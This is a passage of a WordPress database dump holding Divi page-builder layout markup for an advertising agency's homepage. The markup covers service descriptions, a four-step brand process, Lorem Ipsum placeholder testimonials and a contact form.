padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Easy to start</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:26:26','2020-08-07 20:26:26','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(620,1,'2020-08-07 20:27:25','2020-08-07 20:27:25','[et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\" template_type=\"row\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row]','Strategy row1','','publish','closed','closed','','strategy-row1','','','2020-08-07 20:27:25','2020-08-07 20:27:25','',0,'https://wthtest1.in8.cdn-alpha.com/et_pb_layout/strategy-row1/',0,'et_pb_layout','',0),(621,1,'2020-08-07 20:27:41','2020-08-07 20:27:41','[et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\" template_type=\"row\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row]','Strategy Row2','','publish','closed','closed','','strategy-row2','','','2020-08-07 20:27:41','2020-08-07 20:27:41','',0,'https://wthtest1.in8.cdn-alpha.com/et_pb_layout/strategy-row2/',0,'et_pb_layout','',0),(622,1,'2020-08-07 20:28:22','2020-08-07 20:28:22','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" 